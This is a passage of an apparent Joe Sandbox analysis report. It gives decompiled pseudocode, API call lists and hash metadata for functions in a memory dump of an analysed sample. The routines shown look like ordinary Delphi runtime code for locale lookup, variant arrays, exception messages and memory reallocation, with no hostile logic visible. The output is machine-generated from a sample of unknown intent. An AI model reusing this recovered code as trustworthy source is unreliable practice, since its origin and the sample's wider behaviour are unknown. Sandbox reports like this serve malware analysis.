                                                                                                0x0217ad66
                                                                                                0x0217ad62
                                                                                                0x0217ad62
                                                                                                0x0217ad62
                                                                                                0x0217ad6a
                                                                                                0x0217ada7
                                                                                                0x0217ad6c
                                                                                                0x0217ad93
                                                                                                0x0217ad73
                                                                                                0x0217ad73
                                                                                                0x0217ad75
                                                                                                0x0217ad77
                                                                                                0x0217ad79
                                                                                                0x0217ad83
                                                                                                0x0217ad8d
                                                                                                0x0217ad8d
                                                                                                0x0217ad79
                                                                                                0x0217ad92
                                                                                                0x0217ad92
                                                                                                0x0217ad92
                                                                                                0x0217ad9e
                                                                                                0x0217ad6a
                                                                                                0x0217aea9
                                                                                                0x0217aeab
                                                                                                0x0217aeae
                                                                                                0x0217aeb1
                                                                                                0x0217aec3

                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(?,00000000,0217AEC4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0217AD23
                                                                                                  • Part of subcall function 0217A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$InfoThread
                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                • API String ID: 4232894706-1253427255
                                                                                                • Opcode ID: 1207b12d16293530110398d945feefb1edaf45b5436870a5071244552196341a
                                                                                                • Instruction ID: 6f46903783cf0e8b75e7581bd7a8d260f7fb2f663636b513299c2630acafa30d
                                                                                                • Opcode Fuzzy Hash: 1207b12d16293530110398d945feefb1edaf45b5436870a5071244552196341a
                                                                                                • Instruction Fuzzy Hash: 8741CF657C42048FD726AAB9C8906BFB3BBDFC5301B644426E4D1D7344DF35DE028A66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217C620 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217C620() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x2190850 = _t1;
				}
				if( *0x2190850 == 0) {
					 *0x2190850 = E0217823C;
					return E0217823C;
				}
				return _t1;
			}





                                                                                                0x0217c626
                                                                                                0x0217c62b
                                                                                                0x0217c62f
                                                                                                0x0217c637
                                                                                                0x0217c63c
                                                                                                0x0217c63c
                                                                                                0x0217c648
                                                                                                0x0217c64f
                                                                                                0x00000000
                                                                                                0x0217c64f
                                                                                                0x0217c655

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0218F10B,00000000,0218F11E), ref: 0217C626
                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0217C637
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                • API String ID: 1646373207-3712701948
                                                                                                • Opcode ID: b922c1d1e5d6224f07728f8b182afdc6eb8edc301e6c8a15381fbfeb02cf33e7
                                                                                                • Instruction ID: 5b2b17c64d7857b68b90af22e77f2fa6ee0761e69f7691d1f4545f0ddfe1b90d
                                                                                                • Opcode Fuzzy Hash: b922c1d1e5d6224f07728f8b182afdc6eb8edc301e6c8a15381fbfeb02cf33e7
                                                                                                • Instruction Fuzzy Hash: B2D0A7E0FD07C14EFB007BB464C461633F8E3E9601F20247AB00165700C77144508FC0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217E33C Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0217E33C(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E0217E21C(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0217D43C();
							E0217E21C(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0217D444();
							E0217E21C(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0217E2E0(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0217E2B0(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0217D44C();
						E0217E21C(_v780);
						E0217E534(_v792);
					}
				}
				L15:
				_push(_v776);
				L0217CFD4();
				return E0217E21C(_v776);
			}






















                                                                                                0x0217e348
                                                                                                0x0217e358
                                                                                                0x0217e35f
                                                                                                0x0217e35f
                                                                                                0x0217e36a
                                                                                                0x0217e378
                                                                                                0x0217e387
                                                                                                0x0217e3a5
                                                                                                0x0217e389
                                                                                                0x0217e394
                                                                                                0x0217e394
                                                                                                0x0217e3b4
                                                                                                0x0217e3c0
                                                                                                0x0217e3c3
                                                                                                0x0217e3c5
                                                                                                0x0217e3c6
                                                                                                0x0217e3c8
                                                                                                0x0217e3ce
                                                                                                0x0217e3d0
                                                                                                0x0217e3df
                                                                                                0x0217e3e0
                                                                                                0x0217e3ea
                                                                                                0x0217e3eb
                                                                                                0x0217e3f0
                                                                                                0x0217e3fb
                                                                                                0x0217e3fc
                                                                                                0x0217e406
                                                                                                0x0217e407
                                                                                                0x0217e40c
                                                                                                0x0217e427
                                                                                                0x0217e429
                                                                                                0x0217e42a
                                                                                                0x0217e42d
                                                                                                0x0217e42d
                                                                                                0x0217e3ce
                                                                                                0x0217e436
                                                                                                0x0217e439
                                                                                                0x0217e43b
                                                                                                0x0217e43c
                                                                                                0x0217e442
                                                                                                0x0217e448
                                                                                                0x0217e44a
                                                                                                0x0217e44c
                                                                                                0x0217e44f
                                                                                                0x0217e452
                                                                                                0x0217e452
                                                                                                0x0217e455
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217e455
                                                                                                0x0217e455
                                                                                                0x0217e45c
                                                                                                0x0217e467
                                                                                                0x0217e46f
                                                                                                0x0217e476
                                                                                                0x0217e47d
                                                                                                0x0217e47e
                                                                                                0x0217e483
                                                                                                0x0217e48e
                                                                                                0x0217e48e
                                                                                                0x0217e49c
                                                                                                0x0217e4a0
                                                                                                0x0217e4a6
                                                                                                0x0217e4a7
                                                                                                0x0217e4b7

                                                                                                APIs
                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0217E3EB
                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0217E407
                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0217E47E
                                                                                                • VariantClear.OLEAUT32(?), ref: 0217E4A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                • String ID:
                                                                                                • API String ID: 920484758-0
                                                                                                • Opcode ID: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                                                • Instruction ID: 293a81d05a08ee032b36b43e8c34f015822e88c96ea0f1babe323a7036c8cceb
                                                                                                • Opcode Fuzzy Hash: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                                                • Instruction Fuzzy Hash: DB41F879A816299FCB66DB58C890BD9B3FDAF88314F0041E5E649E7211DB34AF808F54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217AF30 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217AF30(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x21937f0; // 0x2170000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0217AF24(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E021782F4( &_v273, 0x104, E0217BDD8( &_v534, 0x5c) + 1);
				_t74 = 0x217b0b0;
				_t86 = 0x217b0b0;
				_t83 =  *0x2176d64; // 0x2176db0
				if(E02173DEC(_t87, _t83) != 0) {
					_t74 = E02174D64( *((intOrPtr*)(_t87 + 4)));
					_t69 = E021782CC(_t74, 0x217b0b0);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x217b0b4;
					}
				}
				_t51 =  *0x2190edc; // 0x2176b4c
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x21937f0; // 0x2170000
				LoadStringA(E02175AF0(_t53),  *_t16,  &_v790, 0x100);
				E02173BD8( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E02178814(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E021782CC(_v8, _t86);
			}































                                                                                                0x0217af30
                                                                                                0x0217af3c
                                                                                                0x0217af3f
                                                                                                0x0217af41
                                                                                                0x0217af4d
                                                                                                0x0217af5c
                                                                                                0x0217af86
                                                                                                0x0217af8c
                                                                                                0x0217af98
                                                                                                0x0217af9d
                                                                                                0x0217afa3
                                                                                                0x0217afa3
                                                                                                0x0217afc1
                                                                                                0x0217afc6
                                                                                                0x0217afcb
                                                                                                0x0217afd2
                                                                                                0x0217afdf
                                                                                                0x0217afe9
                                                                                                0x0217afed
                                                                                                0x0217aff4
                                                                                                0x0217affd
                                                                                                0x0217affd
                                                                                                0x0217aff4
                                                                                                0x0217b00e
                                                                                                0x0217b013
                                                                                                0x0217b017
                                                                                                0x0217b022
                                                                                                0x0217b02f
                                                                                                0x0217b03a
                                                                                                0x0217b040
                                                                                                0x0217b04d
                                                                                                0x0217b053
                                                                                                0x0217b05d
                                                                                                0x0217b063
                                                                                                0x0217b06a
                                                                                                0x0217b070
                                                                                                0x0217b077
                                                                                                0x0217b07d
                                                                                                0x0217b099
                                                                                                0x0217b0ac

                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0217AF4D
                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0217AF71
                                                                                                • GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 0217AF8C
                                                                                                • LoadStringA.USER32 ref: 0217B022
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3990497365-0
                                                                                                • Opcode ID: 6108ef19727310228bde5cc57720d9466eb8df8f82e1450db1ac7540bb5a38d0
                                                                                                • Instruction ID: b9ca34d134c60bb7a4262f7581425ed71a6dce5ac22a6afdb12e45792318efa6
                                                                                                • Opcode Fuzzy Hash: 6108ef19727310228bde5cc57720d9466eb8df8f82e1450db1ac7540bb5a38d0
                                                                                                • Instruction Fuzzy Hash: E1413A71A802589FCB21EB68CC84BDEB7FDAB98304F0440E6A548E7241DB759F88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217AF2E Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0217AF2E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x21937f0; // 0x2170000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0217AF24(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E021782F4( &_v273, 0x104, E0217BDD8( &_v534, 0x5c) + 1);
				_t75 = 0x217b0b0;
				_t89 = 0x217b0b0;
				_t85 =  *0x2176d64; // 0x2176db0
				if(E02173DEC(_t92, _t85) != 0) {
					_t75 = E02174D64( *((intOrPtr*)(_t92 + 4)));
					_t69 = E021782CC(_t75, 0x217b0b0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x217b0b4;
					}
				}
				_t51 =  *0x2190edc; // 0x2176b4c
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x21937f0; // 0x2170000
				LoadStringA(E02175AF0(_t53),  *_t16,  &_v790, 0x100);
				E02173BD8( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E02178814(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E021782CC(_v8, _t89);
			}































                                                                                                0x0217af3c
                                                                                                0x0217af3f
                                                                                                0x0217af41
                                                                                                0x0217af4d
                                                                                                0x0217af5c
                                                                                                0x0217af86
                                                                                                0x0217af8c
                                                                                                0x0217af98
                                                                                                0x0217af9d
                                                                                                0x0217afa3
                                                                                                0x0217afa3
                                                                                                0x0217afc1
                                                                                                0x0217afc6
                                                                                                0x0217afcb
                                                                                                0x0217afd2
                                                                                                0x0217afdf
                                                                                                0x0217afe9
                                                                                                0x0217afed
                                                                                                0x0217aff4
                                                                                                0x0217affd
                                                                                                0x0217affd
                                                                                                0x0217aff4
                                                                                                0x0217b00e
                                                                                                0x0217b013
                                                                                                0x0217b017
                                                                                                0x0217b022
                                                                                                0x0217b02f
                                                                                                0x0217b03a
                                                                                                0x0217b040
                                                                                                0x0217b04d
                                                                                                0x0217b053
                                                                                                0x0217b05d
                                                                                                0x0217b063
                                                                                                0x0217b06a
                                                                                                0x0217b070
                                                                                                0x0217b077
                                                                                                0x0217b07d
                                                                                                0x0217b099
                                                                                                0x0217b0ac

                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0217AF4D
                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0217AF71
                                                                                                • GetModuleFileNameA.KERNEL32(02170000,?,00000105), ref: 0217AF8C
                                                                                                • LoadStringA.USER32 ref: 0217B022
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 3990497365-0
                                                                                                • Opcode ID: 1b7fb2f831dec41029b6cf2e85403a1c1cf1323977078b6de4dcc673a42a45bf
                                                                                                • Instruction ID: 3f9760125c316f916af196f8c2c2437dc1610c02d7abc950df4a39111049e7bb
                                                                                                • Opcode Fuzzy Hash: 1b7fb2f831dec41029b6cf2e85403a1c1cf1323977078b6de4dcc673a42a45bf
                                                                                                • Instruction Fuzzy Hash: 70414A71A802589FDB21EB68CC84BDEB7FDAB98304F0440E5A648E7241DB759F88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02171C9C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E02171C9C(signed int __eax, signed int __edx, void* __edi) {
				signed int _t58;
				signed int _t73;
				signed int _t80;
				signed int _t86;
				signed int _t94;
				signed int _t100;
				void* _t102;
				signed int _t111;
				signed int _t119;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				intOrPtr _t139;
				void* _t141;
				signed int _t143;
				signed int _t145;
				unsigned int _t146;
				signed int _t153;
				unsigned int _t154;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t182;
				unsigned int _t184;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				void* _t202;
				signed int _t203;
				signed int _t204;
				void* _t205;
				signed int _t208;

				_t181 = __edi;
				_t166 = __edx;
				_t145 =  *(__eax - 4);
				_t196 = __eax;
				if((_t145 & 0x00000007) != 0) {
					__eflags = _t145 & 0x00000005;
					if((_t145 & 0x00000005) != 0) {
						__eflags = _t145 & 0x00000003;
						if((_t145 & 0x00000003) != 0) {
							__eflags = 0;
							return 0;
						} else {
							_t146 = _t145 - 0x18;
							__eflags = __edx - _t146;
							if(__edx <= _t146) {
								__eflags = __edx - _t146 >> 1;
								if(__edx < _t146 >> 1) {
									_t131 = __edx;
									_t58 = E02171754(__edx);
									__eflags = _t58;
									if(_t58 == 0) {
										goto L61;
									} else {
										__eflags = _t131 - 0x40a2c;
										if(_t131 > 0x40a2c) {
											 *((intOrPtr*)(_t58 - 8)) = _t131;
										}
										E021714D4(_t196, _t131, _t58);
										E02171ABC(_t196, _t181);
										return _t58;
									}
								} else {
									 *((intOrPtr*)(__eax - 8)) = __edx;
									return __eax;
								}
							} else {
								asm("adc eax, 0xffffffff");
								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
								_push(__edx);
								_t58 = E02171754((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
								_pop(_t168);
								__eflags = _t58;
								if(_t58 != 0) {
									__eflags = _t133 - 0x40a2c;
									if(_t133 > 0x40a2c) {
										 *((intOrPtr*)(_t58 - 8)) = _t168;
									}
									E021714A4(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
									E02171ABC(_t196, _t181);
									return _t58;
								}
								L61:
								return _t58;
							}
						}
					} else {
						_t153 = _t145 & 0xfffffff0;
						_push(__edi);
						_t182 = _t153 + __eax;
						_t154 = _t153 - 4;
						_t136 = _t145 & 0x0000000f;
						__eflags = __edx - _t154;
						if(__edx > _t154) {
							_t73 =  *(_t182 - 4);
							__eflags = _t73 & 0x00000001;
							if((_t73 & 0x00000001) == 0) {
								L51:
								asm("adc edi, 0xffffffff");
								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
								_t184 = _t154;
								_t80 = E02171754(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
								_t170 = _t166;
								__eflags = _t80;
								if(_t80 == 0) {
									goto L49;
								} else {
									__eflags = _t198 - 0x40a2c;
									if(_t198 > 0x40a2c) {
										 *((intOrPtr*)(_t80 - 8)) = _t170;
									}
									E021714A4(_t196, _t184, _t80);
									E02171ABC(_t196, _t184);
									return _t80;
								}
							} else {
								_t86 = _t73 & 0xfffffff0;
								_t202 = _t154 + _t86;
								__eflags = __edx - _t202;
								if(__edx > _t202) {
									goto L51;
								} else {
									__eflags =  *0x2191045;
									if(__eflags == 0) {
										L42:
										__eflags = _t86 - 0xb30;
										if(_t86 >= 0xb30) {
											E021714F0(_t182);
											_t166 = _t166;
											_t154 = _t154;
										}
										asm("adc edi, 0xffffffff");
										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t173 = _t202 + 4 - _t94;
										__eflags = _t173;
										if(_t173 > 0) {
											 *(_t196 + _t202 - 4) = _t173;
											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
											_t203 = _t94;
											__eflags = _t173 - 0xb30;
											if(_t173 >= 0xb30) {
												__eflags = _t94 + _t196;
												E02171530(_t94 + _t196, _t154, _t173);
											}
										} else {
											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
											_t203 = _t202 + 4;
										}
										_t204 = _t203 | _t136;
										__eflags = _t204;
										 *(_t196 - 4) = _t204;
										 *0x2191710 = 0;
										_t80 = _t196;
										L49:
										return _t80;
									} else {
										while(1) {
											asm("lock cmpxchg [0x2191710], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t166 = _t166;
											_t154 = _t154;
											asm("lock cmpxchg [0x2191710], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t166 = _t166;
												_t154 = _t154;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										_t100 =  *(_t182 - 4);
										__eflags = _t100 & 0x00000001;
										if((_t100 & 0x00000001) == 0) {
											L50:
											 *0x2191710 = 0;
											goto L51;
										} else {
											_t86 = _t100 & 0xfffffff0;
											_t202 = _t154 + _t86;
											__eflags = _t166 - _t202;
											if(_t166 > _t202) {
												goto L50;
											} else {
												goto L42;
											}
										}
									}
								}
							}
						} else {
							_t205 = __edx + __edx;
							__eflags = _t205 - _t154;
							if(_t205 < _t154) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L19:
									_t16 = _t166 + 0xd3; // 0xbff
									_t208 = (_t16 & 0xffffff00) + 0x30;
									_t157 = _t154 + 4 - _t208;
									__eflags =  *0x2191045;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x2191710], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t157 = _t157;
											asm("lock cmpxchg [0x2191710], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t157 = _t157;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										__eflags = 0xf;
									}
									 *(_t196 - 4) = _t136 | _t208;
									_t139 = _t157;
									_t174 =  *(_t182 - 4);
									__eflags = _t174 & 0x00000001;
									if((_t174 & 0x00000001) != 0) {
										_t102 = _t182;
										_t175 = _t174 & 0xfffffff0;
										_t139 = _t139 + _t175;
										_t182 = _t182 + _t175;
										__eflags = _t175 - 0xb30;
										if(_t175 >= 0xb30) {
											E021714F0(_t102);
										}
									} else {
										 *(_t182 - 4) = _t174 | 0x00000008;
									}
									 *((intOrPtr*)(_t182 - 8)) = _t139;
									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
									__eflags = _t139 - 0xb30;
									if(_t139 >= 0xb30) {
										E02171530(_t196 + _t208, _t157, _t139);
									}
									 *0x2191710 = 0;
									return _t196;
								} else {
									__eflags = _t205 - 0xb2c;
									if(_t205 < 0xb2c) {
										_t190 = __edx;
										_t111 = E02171754(__edx);
										__eflags = _t111;
										if(_t111 != 0) {
											E021714D4(_t196, _t190, _t111);
											E02171ABC(_t196, _t190);
										}
										return _t111;
									} else {
										_t166 = 0xb2c;
										goto L19;
									}
								}
							} else {
								return __eax;
							}
						}
					}
				} else {
					_t141 =  *_t145;
					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
					if(_t160 < __edx) {
						_push(__edi);
						_t193 = __edx;
						asm("adc eax, 0xffffffff");
						_t119 = E02171754((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
						__eflags = _t119;
						if(_t119 != 0) {
							__eflags = _t193 - 0x40a2c;
							if(_t193 > 0x40a2c) {
								 *((intOrPtr*)(_t119 - 8)) = _t193;
							}
							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
							_t195 = _t119;
							 *((intOrPtr*)(_t141 + 0x1c))();
							E02171ABC(_t196, _t195);
							_t119 = _t195;
						}
						return _t119;
					} else {
						if(0x40 + __edx * 4 < _t160) {
							_t143 = __edx;
							_t125 = E02171754(__edx);
							__eflags = _t125;
							if(_t125 != 0) {
								E021714D4(_t196, _t143, _t125);
								E02171ABC(_t196, __edi);
								return _t125;
							}
							return _t125;
						} else {
							return __eax;
						}
					}
				}
			}










































                                                                                                0x02171c9c
                                                                                                0x02171c9c
                                                                                                0x02171c9c
                                                                                                0x02171ca4
                                                                                                0x02171ca6
                                                                                                0x02171d34
                                                                                                0x02171d37
                                                                                                0x02171f88
                                                                                                0x02171f8b
                                                                                                0x0217201c
                                                                                                0x02172020
                                                                                                0x02171f91
                                                                                                0x02171f91
                                                                                                0x02171f94
                                                                                                0x02171f96
                                                                                                0x02171fde
                                                                                                0x02171fe0
                                                                                                0x02171fe8
                                                                                                0x02171fec
                                                                                                0x02171ff1
                                                                                                0x02171ff3
                                                                                                0x00000000
                                                                                                0x02171ff5
                                                                                                0x02171ff5
                                                                                                0x02171ffb
                                                                                                0x02171ffd
                                                                                                0x02171ffd
                                                                                                0x02172008
                                                                                                0x0217200f
                                                                                                0x02172018
                                                                                                0x02172018
                                                                                                0x02171fe2
                                                                                                0x02171fe2
                                                                                                0x02171fe7
                                                                                                0x02171fe7
                                                                                                0x02171f98
                                                                                                0x02171fa3
                                                                                                0x02171faa
                                                                                                0x02171fac
                                                                                                0x02171fad
                                                                                                0x02171fb2
                                                                                                0x02171fb3
                                                                                                0x02171fb5
                                                                                                0x02171fb7
                                                                                                0x02171fbd
                                                                                                0x02171fbf
                                                                                                0x02171fbf
                                                                                                0x02171fcb
